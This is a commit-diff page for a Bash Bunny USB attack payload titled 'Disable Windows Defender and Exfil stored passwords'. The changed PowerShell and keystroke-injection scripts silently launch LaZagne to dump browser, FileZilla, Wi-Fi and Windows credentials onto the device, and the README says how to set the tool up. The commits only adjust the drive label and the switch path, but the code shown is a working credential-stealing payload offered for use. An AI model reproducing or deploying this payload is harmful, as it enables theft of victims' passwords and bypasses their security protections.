Compare commits
2 Commits
b1cf7e8ef4
...
774cc77212
Author | SHA1 | Date |
---|---|---|
Rafa Guillermo | 774cc77212 | |
Rafa Guillermo | 5da19abe97 |
|
@ -1,4 +1,5 @@
|
|||
$dest = ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'loot\PasswordGrabber')
|
||||
$drivelabel = 'BashBunny'
|
||||
$dest = ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'loot\PasswordGrabber')
|
||||
$filter = 'password_'+ $env:COMPUTERNAME
|
||||
$filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1)
|
||||
Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'tooling\LaZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt')
|
||||
|
|
|
@ -2,16 +2,13 @@
|
|||
#
|
||||
# Title: Disable Windows Defender and Exfil stored passwords
|
||||
# Description: Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
|
||||
# Disables Windows defender and runs LaZagne to grab passwords from the host system from apps like:
|
||||
# chrome, internet explorer, firefox, filezilla and more. Wifi passwords and Win password hashes included.
|
||||
# This payload is quick, but opens up an ugly PS terminal which can probably be obfuscated. This payload
|
||||
# springboards off of AleZssandroZ's LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
|
||||
#
|
||||
# This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
|
||||
# This payload makes use of AleZssandroZ awesome LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
|
||||
# Author: rafa-guillermo
|
||||
# Props: Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade, jdebetaz
|
||||
# Version: 1.0
|
||||
# Version: 1.2
|
||||
# Category: Credentials
|
||||
# Target: Windows 11
|
||||
# Target: Windows
|
||||
# Tested On: Windows 11
|
||||
# Attackmodes: HID, STORAGE
|
||||
|
||||
|
@ -22,6 +19,7 @@ LOOTDIR=/root/udisk/loot/PasswordGrabber
|
|||
LED SETUP
|
||||
GET SWITCH_POSITION
|
||||
ATTACKMODE HID STORAGE
|
||||
DRIVE_LABEL=BashBunny
|
||||
|
||||
######## Make Loot Dir ########
|
||||
# Setup named logs in loot directory
|
||||
|
@ -53,9 +51,9 @@ sleep 1
|
|||
|
||||
# Run laZagne
|
||||
LED STAGE2
|
||||
QUACK STRING "\$bashBunnyDrive = (Get-WmiObject -Query \"SELECT * FROM Win32_Volume WHERE Label='BashBunny'\" | Select-Object -ExpandProperty DriveLetter)"
|
||||
QUACK STRING "\$bashBunnyDrive = (Get-WmiObject -Query \"SELECT * FROM Win32_Volume WHERE Label='$DRIVE_LABEL'\" | Select-Object -ExpandProperty DriveLetter)"
|
||||
QUACK ENTER
|
||||
QUACK STRING "\$scriptPath = \"\$bashBunnyDrive\\payloads\\switch1\\payload.ps1\""
|
||||
QUACK STRING "\$scriptPath = \"\$bashBunnyDrive\\payloads\\$SWITCH_POSITION\\\payload.ps1\""
|
||||
QUACK ENTER
|
||||
QUACK STRING \& \$scriptPath
|
||||
QUACK ENTER
|
||||
|
|
|
@ -16,7 +16,8 @@ Password grabber: [Also in this repo](https://github.com/hak5/bashbunny-payloads
|
|||
## Configuration
|
||||
1. You need to download LaZagne from the [LaZagne release page](https://github.com/AlessandroZ/LaZagne/releases). Tested with LaZagne 2.2 but might work with newer versions too.
|
||||
2. Unzip the exe file and place it in the folder called 'tooling' on the root of the Bash Bunny. The payload folder should contain payload.ps1 and payload.txt, LaZagne.exe needs to be in a folder called tooling.
|
||||
3. Plug your BashBunny and Enjoy
|
||||
3. Set up your Bash Bunny Drive Label (default is BashBunny, config is on line 22 of payload.txt and line 1 of payload.ps1)
|
||||
4. Plug your BashBunny and Enjoy
|
||||
|
||||
|
||||
## Info
|
||||
|
|
Loading…
Reference in New Issue